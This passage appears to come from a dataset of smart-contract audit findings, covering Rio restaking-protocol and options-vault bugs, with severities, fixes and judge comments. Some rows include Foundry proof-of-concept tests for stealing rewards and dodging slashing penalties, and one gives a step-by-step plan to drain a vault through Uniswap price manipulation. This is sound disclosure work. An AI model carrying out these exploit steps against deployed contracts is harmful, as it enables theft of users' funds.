credentials.\\n //-> This is to ""simulate"" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> A full withdrawal for the validator is processed, 8ETH (40ETH - 32ETH) will be queued as rewards\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Bob, an attacker, does the following:\\n // 1. Deposits 40ETH and receives ~40e18 LRTTokens\\n // 2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n // 3. Requests a withdrawal with all of the LRTTokens \\n {\\n //1. Deposits 40ETH and receives ~40e18 LRTTokens\\n vm.startPrank(bob);\\n reETH.coordinator.depositETH{value: bobInitialBalance}();\\n\\n //2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n uint256 TVLBefore = reETH.assetRegistry.getTVL();\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); \\n uint256 TVLAfter = reETH.assetRegistry.getTVL();\\n\\n //->TVL increased by 7.2ETH\\n assertEq(TVLAfter - TVLBefore, 7.2e18);\\n\\n //3. Requests a withdrawal with all of the LRTTokens \\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, reETH.token.balanceOf(bob));\\n vm.stopPrank();\\n }\\n \\n //-> Wait and rebalance\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Bob withdraws the funds he requested\\n vm.prank(bob);\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n\\n //-> Bob has stole ~50% of the rewards and has 3.59ETH more than he initially started with\\n assertGt(bob.balance, bobInitialBalance);\\n assertEq(bob.balance - bobInitialBalance, 3599550056000000000);\\n}\\n```\\n",When requesting withdrawals via RioLRTCoordinator::requestWithdrawal() don't distribute the rewards received in the current epoch.,"Rewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), however this requires a bigger investment in funds the higher the protocol TVL.","```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n" +The protocol can't receive rewards because of low gas limits on ETH transfers,medium,"The hardcoded gas limit of the Asset::transferETH() function, used to transfer ETH in the protocol, is too low and will result unwanted reverts.\\nETH transfers in the protocol are always done via Asset::transferETH(), which performs a low-level call with an hardcoded gas limit of 10_000:\\n```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n\\nThe hardcoded `10_000` gas limit is not high enough for the protocol to be able receive and distribute rewards. Rewards are currently only available for native ETH, an are received by Rio via:\\nPartial withdrawals\\nETH in excess of `32ETH` on full withdrawals\\nThe flow to receive rewards requires two steps:\\nAn initial call to EigenPod::verifyAndProcessWithdrawals(), which queues a withdrawal to the Eigenpod owner: an `RioLRTOperatorDelegator` instance\\nA call to DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe call to DelayedWithdrawalRouter::claimDelayedWithdrawals() triggers the following flow:\\nETH are transferred to the RioLRTOperatorDelegator instance, where the `receive()` function is triggered.\\nThe `receive()` function of RioLRTOperatorDelegator transfers ETH via Asset::transferETH() to the RioLRTRewardDistributor, where another `receive()` function is triggered.\\nThe `receive()` function of RioLRTRewardDistributor transfers ETH via Asset::transferETH() to the `treasury`, the `operatorRewardPool` and the `RioLRTDepositPool`.\\nThe gas is limited at `10_000` in step `2` and is not enough to perform step `3`, making it impossible for the protocol to receive rewards and leaving funds stuck.\\nPOC\\nAdd the following imports to RioLRTOperatorDelegator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nfunction test_outOfGasOnRewards() public {\\n address alice = makeAddr(""alice"");\\n uint256 initialBalance = 40e18;\\n deal(alice, initialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: initialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to ""simulate"" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> Process a full withdrawal, 8ETH (40ETH - 32ETH) will be queued withdrawal as ""rewards""\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Call `claimDelayedWithdrawals` to claim the withdrawal\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); //❌ Reverts for out-of-gas\\n}\\n```\\n","Remove the hardcoded `10_000` gas limit in Asset::transferETH(), at least on ETH transfers where the destination is a protocol controlled contract.",The protocol is unable to receive rewards and the funds will be stucked.,"```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n" +Stakers can avoid validator penalties,medium,"Stakers can frontrun validators penalties and slashing events with a withdrawal request in order to avoid the loss, this is possible if the deposit pool has enough liquidity available.\\nValidators can lose part of their deposit via penalties or slashing events:\\nIn case of penalties Eigenlayer can be notified of the balance drop via the permissionless function EigenPod::verifyBalanceUpdates().\\nIn case of slashing the validator is forced to exit and Eigenlayer can be notified via the permissionless function EigenPod::verifyAndProcessWithdrawals() because the slashing event is effectively a full withdrawal.\\nAs soon as either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() is called the TVL of the Rio protocol drops instantly. This is because both of the functions update the variable podOwnerShares[podOwner]:\\nEigenPod::verifyBalanceUpdates() will update the variable here\\nEigenPod::verifyAndProcessWithdrawals() will update the variable here\\nThis makes it possible for stakers to:\\nRequest a withdrawal via RioLRTCoordinator::rebalance() for all the `LRTTokens` held.\\nCall either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals().\\nAt this point when RioLRTCoordinator::rebalance() will be called and a withdrawal will be queued that does not include penalties or slashing.\\nIt's possible to withdraw `LRTTokens` while avoiding penalties or slashing up to the amount of liquidity available in the deposit pool.\\nPOC\\nI wrote a POC whose main point is to show that requesting a withdrawal before an instant TVL drop will withdraw the full amount requested without taking the drop into account. The POC doesn't show that EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() actually lowers the TVL because I wasn't able to implement it in the tests.\\nAdd imports to RioLRTCoordinator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nIRioLRTOperatorRegistry.StrategyShareCap[] public emptyStrategyShareCaps;\\nfunction test_avoidInstantPriceDrop() public {\\n //-> Add two operators with 1 validator each\\n uint8[] memory operatorIds = addOperatorDelegators(\\n reETH.operatorRegistry,\\n address(reETH.rewardDistributor),\\n 2,\\n emptyStrategyShareCaps,\\n 1\\n );\\n address operatorAddress0 = address(uint160(1));\\n\\n //-> Deposit ETH so there's 74ETH in the deposit pool\\n uint256 depositAmount = 2*ETH_DEPOSIT_SIZE - address(reETH.depositPool).balance;\\n uint256 amountToWithdraw = 10 ether;\\n reETH.coordinator.depositETH{value: amountToWithdraw + depositAmount}();\\n\\n //-> Stake the 64ETH on the validators, 32ETH each and 10 ETH stay in the deposit pool\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker notices a validator is going receive penalties and immediately requests a withdrawal of 10ETH\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, amountToWithdraw);\\n\\n //-> Validator get some penalties and Eigenlayer notified \\n //IMPORTANT: The following block of code it's a simulation of what would happen if a validator balances gets lowered because of penalties\\n //and `verifyBalanceUpdates()` gets called on Eigenlayer. It uses another bug to achieve an instant loss of TVL.\\n\\n // ~~~Start penalties simulation~~~\\n {\\n //-> Verify validators credentials of the two validators\\n verifyCredentialsForValidators(reETH.operatorRegistry, 1, 1);\\n verifyCredentialsForValidators(reETH.operatorRegistry, 2, 1);\\n\\n //-> Cache current TVL and ETH Balance\\n uint256 TVLBefore = reETH.coordinator.getTVL();\\n\\n //->Operator calls `undelegate()` on Eigenlayer\\n //IMPORTANT: This achieves the same a calling `verifyBalanceUpdates()` on Eigenlayer after a validator suffered penalties,\\n //an instant drop in TVL.\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorIds[0]);\\n vm.prank(operatorAddress0);\\n delegationManager.undelegate(details.delegator);\\n\\n //-> TVL dropped\\n uint256 TVLAfter = reETH.coordinator.getTVL();\\n\\n assertLt(TVLAfter, TVLBefore);\\n }\\n // ~~~End penalties simulation~~~\\n\\n //-> Rebalance gets called\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker receives all of the ETH he withdrew, avoiding the effect of penalties\\n uint256 balanceBefore = address(this).balance;\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n uint256 balanceAfter = address(this).balance;\\n assertEq(balanceAfter - balanceBefore, amountToWithdraw);\\n}\\n```\\n","When RioLRTCoordinator::rebalance() is called and penalties or slashing events happened during the epoch being settled, distribute the correct amount of penalties to all the `LRTTokens` withdrawn in the current epoch, including the ones that requested the withdrawal before the drop.",Stakers can avoid validator penalties and slashing events if there's enough liquidity in the deposit pool.,"```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n" +All operators can have ETH deposits regardless of the cap setted for them leading to miscalculated TVL,medium,"Some operators might not be eligible for using some strategies in the LRT's underlying tokens. However, in default every operator can have ETH deposits which would impact the TVL/Exchange rate of the LRT regardless of they have a cap or not.\\nFirst, let's examine how an operator can have ETH deposit\\nAn operator can have ETH deposits by simply staking in beacon chain, to do so they are not mandatory to call EigenPods ""stake"" function. They can do it separately without calling the EigenPods stake function.\\nAlso, every operator delegator contract can call `verifyWithdrawalCredentials` to increase EigenPod shares and decrease the queued ETH regardless of they are active operator or they have a cap determined for BEACON_CHAIN_STRATEGY.\\nNow, let's look at how the TVL of ETH (BEACON_CHAIN_STRATEGY) is calculated in the AssetRegistry:\\n```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n\\nAs we can see above, regardless of the operators cap the entire active validator counts are looped.\\n```\\nfunction getEigenPodShares() public view returns (int256) {\\n return eigenPodManager.podOwnerShares(address(this));\\n }\\n\\n function getETHQueuedForWithdrawal() public view returns (uint256) {\\n uint256 ethQueuedSlotData;\\n assembly {\\n ethQueuedSlotData := sload(ethQueuedForUserSettlementGwei.slot)\\n }\\n\\n uint64 userSettlementGwei = uint64(ethQueuedSlotData);\\n uint64 operatorExitAndScrapeGwei = uint64(ethQueuedSlotData 64);\\n\\n return (userSettlementGwei + operatorExitAndScrapeGwei).toWei();\\n }\\n\\n function getETHUnderManagement() external view returns (uint256) {\\n int256 aum = getEigenPodShares() + int256(getETHQueuedForWithdrawal());\\n if (aum < 0) return 0;\\n\\n return uint256(aum);\\n }\\n```\\n\\nSince the operator has eigen pod shares, the TVL will account it aswell. However, since the operator is not actively participating on ether deposits (not in the heap order) the withdrawals or deposits to this specific operator is impossible. Hence, the TVL is accounting an operators eigen pod share which the contract assumes that it is not in the heap.\\nTextual PoC: Assume there are 5 operators whereas only 4 of these operators are actively participating in BEACON_CHAIN_STRATEGY which means that 1 operator has no validator caps set hence, it is not in the heap order. However, this operator can still have ether deposits and can verify them. Since the TVL accounting loops over all the operators but not the operators that are actively participating in beacon chain strategy, the TVL calculated will be wrong.",put a check on `verifyWithdrawalCredentials` that is not possible to call the function if the operator is not actively participating in the BEACON_CHAIN_STRATEGY.,Miscalculation of total ether holdings of an LRT. Withdrawals can fail because the calculated ether is not existed in the heap but the TVL says there are ether to withdraw from the LRT.,"```\\nfunction getTVLForAsset(address asset) public view returns (uint256) {\\n uint256 balance = getTotalBalanceForAsset(asset);\\n if (asset == ETH_ADDRESS) {\\n return balance;\\n }\\n return convertToUnitOfAccountFromAsset(asset, balance);\\n }\\n\\n function getTotalBalanceForAsset(address asset) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(getAssetStrategy(asset), sharesHeld);\\n\\n return tokensInRio + tokensInEigenLayer;\\n }\\n\\n function getETHBalanceInEigenLayer() public view returns (uint256 balance) {\\n balance = ethBalanceInUnverifiedValidators;\\n\\n IRioLRTOperatorRegistry operatorRegistry_ = operatorRegistry();\\n -> uint8 endAtID = operatorRegistry_.operatorCount() + 1; // Operator IDs start at 1.\\n -> for (uint8 id = 1; id < endAtID; ++id) {\\n -> balance += operatorDelegator(operatorRegistry_, id).getETHUnderManagement();\\n }\\n }\\n```\\n" +`requestWithdrawal` doesn't estimate accurately the available shares for withdrawals,medium,"The `requestWithdrawal` function inaccurately estimates the available shares for withdrawals by including funds stored in the deposit pool into the already deposited EigenLayer shares. This can potentially lead to blocking withdrawals or users receiving less funds for their shares.\\nFor a user to withdraw funds from the protocol, they must first request a withdrawal using the `requestWithdrawal` function, which queues the withdrawal in the current epoch by calling `withdrawalQueue().queueWithdrawal`.\\nTo evaluate the available shares for withdrawal, the function converts the protocol asset balance into shares:\\n```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n\\nThe issue arises from the `getTotalBalanceForAsset` function, which returns the sum of the protocol asset funds held, including assets already deposited into EigenLayer and assets still in the deposit pool:\\n```\\nfunction getTotalBalanceForAsset(\\n address asset\\n) public view returns (uint256) {\\n if (!isSupportedAsset(asset)) revert ASSET_NOT_SUPPORTED(asset);\\n\\n address depositPool_ = address(depositPool());\\n if (asset == ETH_ADDRESS) {\\n return depositPool_.balance + getETHBalanceInEigenLayer();\\n }\\n\\n uint256 sharesHeld = getAssetSharesHeld(asset);\\n uint256 tokensInRio = IERC20(asset).balanceOf(depositPool_);\\n uint256 tokensInEigenLayer = convertFromSharesToAsset(\\n getAssetStrategy(asset),\\n sharesHeld\\n );\\n\\n return tokensInRio + tokensInEigenLayer;\\n}\\n```\\n\\nThis causes the calculated `availableShares` to differ from the actual shares held by the protocol because the assets still in the deposit pool shouldn't be converted to shares with the current share price (shares/asset) as they were not deposited into EigenLayer yet.\\nDepending on the current shares price, the function might over or under-estimate the available shares in the protocol. This can potentially result in allowing more queued withdrawals than the available shares in the protocol, leading to blocking withdrawals later on or users receiving less funds for their shares.",There is no straightforward way to handle this issue as the asset held by the deposit pool can't be converted into shares while they were not deposited into EigenLayer. The code should be reviewed to address this issue.,"The `requestWithdrawal` function inaccurately estimates the available shares for withdrawals, potentially resulting in blocking withdrawals or users receiving less funds for their shares.","```\\nuint256 availableShares = assetRegistry().convertToSharesFromAsset(asset, assetRegistry().getTotalBalanceForAsset(asset));\\n```\\n" +Slashing penalty is unfairly paid by a subset of users if a deficit is accumulated.,medium,"If a deficit is accumulated in the EigenPodManager due to slashing when ETH is being withdrawn the slashing payment will be taken from the first cohort to complete a withdrawal.\\nA deficit can happen in `podOwnerShares[podOwner]` in the EigenPodManager in the EigenLayer protocol. This can happen if validators are slashed when ETH is queued for withdrawal.\\nThe issue is that this deficit will be paid for by the next cohort to complete a withdrawal by calling `settleEpochFromEigenLayer()`.\\nIn the following code we can see how `epochWithdrawals.assetsReceived` is calculated based on the amount received from the `delegationManager.completeQueuedWithdrawal` call\\n```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nthe amount received could be 0 if the deficit is larger than the amount queued for this cohort. See following code in `withdrawSharesAsTokens()` EigenPodManager\\n```\\n } else {\\n podOwnerShares[podOwner] += int256(shares);\\n emit PodSharesUpdated(podOwner, int256(shares));\\n return;\\n }\\n```\\n\\nThese users will pay for all slashing penalties instead of it being spread out among all LRT holders.",A potential solution to deal with this is to check if a deficit exists in `settleEpochFromEigenLayer()`. If it exists functionality has to be added that spreads the cost of the penalty fairly among all LRT holders.,"If a deficit is accumulated the first cohort to settle will pay for the entire amount. If they can not cover it fully, they will receive 0 and the following cohort will pay for the rest.","```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n" +ETH withdrawers do not earn yield while waiting for a withdrawal,medium,"In the Rio doc we can read the following\\n""Users will continue to earn yield as they wait for their withdrawal request to be processed.""\\nThis is not true for withdrawals in ETH since they will simply receive an equivalent to the `sharesOWed` calculated when requesting a withdrawal.\\nWhen `requestWithdrawal()` is called to withdraw ETH `sharesOwed` is calculated\\n```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n\\nThe total `sharesOwed` in ETH is added to `epcohWithdrawals.assetsReceived` if we settle with `settleCurrentEpoch()` or `settleEpochFromEigenlayer()`\\nBelow are the places where `assetsReceived` is is set and accumulated\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived);\\n```\\n\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived); \\n```\\n\\n```\\nepochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nwhen claiming rewards this is used to calculate users share\\n```\\namountOut = userSummary.sharesOwed.mulDiv(epochWithdrawals.assetsReceived, epochWithdrawals.sharesOwed);\\n```\\n\\nThe portion of staking rewards accumulated during withdrawal that belongs to LRT holders is never accounted for so withdrawing users do not earn any rewards when waiting for a withdrawal to be completed.",Account for the accumulate rewards during the withdrawal period that belongs to the deposit pool. This can be calculated based on data in DelayedWithdrawalRouter on Eigenlayer.,"Since a portion of the staking reward belongs to the LRT holders and since the docs mentions that yield is accumulated while in the queue It is fair to assume that withdrawing users have a proportional claim to the yield.\\nAs shown above this is not true, users withdrawing in ETH do no earn any rewards when withdrawing.\\nNot all depositors will be able to withdraw their assets/principal for non-ETH assets.\\nCzar102\\nI see. I will leave it a duplicate of #109, as it was, which will not change the reward distribution from the scenario where it was invalidated. cc @nevillehuang\\nThanks for reminding me to remove #177 from the duplicates @0xmonrel.\\nCzar102\\nResult: Medium Has Duplicates\\nConsidering this a Medium since the loss is constrained to the interest during some of the withdrawal time, which is a small part of the deposits.\\nsherlock-admin3\\nEscalations have been resolved successfully!\\nEscalation status:\\n0xmonrel: accepted","```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n" +The sign of delta hedge amount can be reversed by malicious user due to incorrect condition in `FinanceIGDelta.deltaHedgeAmount`,high,"When delta hedge amount is calculated after the trade, the final check is to account for sqrt computation error and ensure the exchanged amount of side token doesn't exceed amount of side tokens the vault has. The issue is that this check is incorrect: it compares absolute value of the delta hedge amount, but always sets positive amount of side tokens if the condition is true. If the delta hedge amount is negative, this final check will reverse the sign of the delta hedge amount, messing up the hedged assets the protocol has.\\nAs a result, if the price moves significantly before the next delta hedge, protocol might not have enough funds to pay off users due to incorrect hedging. It also allows the user to manipulate underlying uniswap pool, then force the vault to delta hedge large amount at very bad price while trading tiny position of size 1 wei, without paying any fees. Repeating this process, the malicious user can drain/steal all funds from the vault in a very short time.\\nThe final check in calculating delta hedge amount in `FinanceIGDelta.deltaHedgeAmount` is:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe logic is that if due to small computation errors, delta hedge amount (to sell side token) can slightly exceed amount of side tokens the vault has, when in reality it means to just sell all side tokens the vault has, then delta hedge amount should equal to side tokens amount vault has.\\nThe issue here is that only positive delta hedge amount means vault has to sell side tokens, while negative amount means it has to buy side tokens. But the condition compares `abs(tokensToSwap)`, meaning that if the delta hedge amount is negative, but in absolute value very close to side tokens amount the vault has, then the condition will also be true, which will set `tokensToSwap` to a positive amount of side tokens, i.e. will reverse the delta hedge amount from `-sideTokens` to `+sideTokens`.\\nIt's very easy for malicious user to craft such situation. For example, if current price is significantly greater than strike price, and there are no other open trades, simply buy IG bull options for 50% of the vault amount. Then buy IG bull options for another 50%. The first trade will force the vault to buy ETH for delta hedge, while the second trade will force the vault to sell the same ETH amount instead of buying it. If there are open trades, it's also easy to calculate the correct proportions of the trades to make `delta hedge amount = -side tokens`.\\nOnce the vault incorrectly hedges after malicious user's trade, there are multiple bad scenarios which will harm the protocol. For example:\\nIf no trade happens for some time and the price increases, the protocol will have no side tokens to hedge, but the bull option buyers will still receive their payoff, leaving vault LPs in a loss, up to a situation when the vault will not have enough funds to even pay the option buyers payoff.\\nMalicious user can abuse the vault's incorrect hedge to directly profit from it. After the trade described above, any trade, even 1 wei trade, will make vault re-hedge with the correct hedge amount, which can be a significant amount. Malicious user can abuse it by manipulating the underlying uniswap pool: 2.1. Buy underlying uniswap pool up to the edge of allowed range (say, +1.8% of current price, average price of ETH bought = +0.9% of current price) 2.2. Provide uniswap liquidity in that narrow range (+1.8%..+2.4%) 2.3. Open/close any position in IG with amount = 1 wei (basically paying no fees) -> this forces the vault to delta hedge (buy) large amount of ETH at inflated price ~+2% of the current price. 2.5. Remove uniswap liquidity. 2.6. Sell back in the uniswap pool. 2.7. During the delta hedge, uniswap position will buy ETH (uniswap liquidity will sell ETH) at the average price of +2.1% of the current price, also receiving pool fees. The fees for manipulating the pool and ""closing"" position via providing liquidity will cancel out and overall profit will be: +2.1% - 0.9% = +1.2% of the delta hedge amount.\\nThe strategy can be enchanced to optimize the profitability, but the idea should be clear.","The check should be done only when `tokensToSwap` is positive:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n- if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n+ if (tokensToSwap > 0 && SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n","Malicious user can steal all vault funds, and/or the vault LPs will incur losses higher than uniswap LPs or vault will be unable to payoff the traders due to incorrect hedged amount.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from 